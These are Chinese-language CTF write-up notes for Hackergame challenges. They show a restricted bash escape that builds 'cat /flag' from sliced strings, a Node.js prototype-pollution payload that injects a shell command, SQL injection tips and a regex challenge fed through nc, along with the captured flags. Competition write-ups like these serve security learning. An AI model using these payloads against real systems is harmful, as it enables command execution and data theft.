之前记录的,现在再整理一下,如果网站还开着抽空补一下
powerfulshell题解
flag{N0w_I_Adm1t_ur_tru1y_5He11_m4ster_237e30ac4b}
PowerfulShell@hackergame> __3=~
PowerfulShell@hackergame> __4=`${__3:2:1}${__3:7:7} ${__3:$[1-1]:1}`
__5=$_
${__4:15:1}${__3:3:1}${__5:4:4} ${__3:$[1-1]:1}${__4:17:4}
${::}可以截取字符串
~就是当前目录
这样搞出ls /
这样就可以截取字母组成cat /flag了
nodejs题解
在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。
在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。
__filename 表示当前正在执行的脚本的文件名。它将输出文件所在位置的绝对路径,且和命令行参数所指定的文件名不一定相同。 如果在模块中,返回的值是模块文件的路径。
__dirname 表示当前执行脚本所在的目录。
flag{n0_pr0topOIl_50_U5E_new_Map_1n5teAD_Of_0bject2kv_cc194f1470}
{"key":"__proto__.frd","value":"cat /flag"
}
核心代码
https://chal03-aq89s8rf.hack-challenge.lug.ustc.edu.cn:8443/execute?cmd=frd
原型链污染(找到对某变量的key赋值的,key可以被换掉,然后再找到一个没有初始化或者没用过但是可以调用的变量)
GPT题解flag{enJ0y_y0uR_Sq1_&_1_would_xiaZHOU_hUI_guo_e50d4a9d5c}
sql注入,注意#和%23不好使
用--+
另外database()不好使
然后是字符型,要注意引号
用 order by检测
然后找出shown=false的那个正则表达式题解
cat try1.txt - |nc 202.38.93.141 30303
Please input your token:
Enter difficulty level (1~3): Enter your regex: Pass 13086806747501745120 True True
flag{p0werful_r3gular_expressi0n_easy_07900eb2d5}
只看后4位,但是无论网站还是nc终端还是pexpect都只能输入4096个字符,多的不认,必须使用cat管道,文件第一行放token,第二行放难度第二问
flag{pow3rful_r3gular_expressi0n_medium_30a5255baf}
https://s3.boskent.com/divisibility-regex/divisibility-regex.html
这个网站直接按照自动机方法生成,但是十进制数很大时很慢,所以第一问不用xzrj
第二问
Solution of x2 ≡ 221961853047945 (mod 281474976710656) :
x ≡ 22699158438083 (mod 140737488355328)
x ≡ -22699158438083 (mod 140737488355328)
The number of solutions (mod 281474976710656) is 4
Return to main page
反解方程两个解
一个是12432281280392
另一个是67260673857566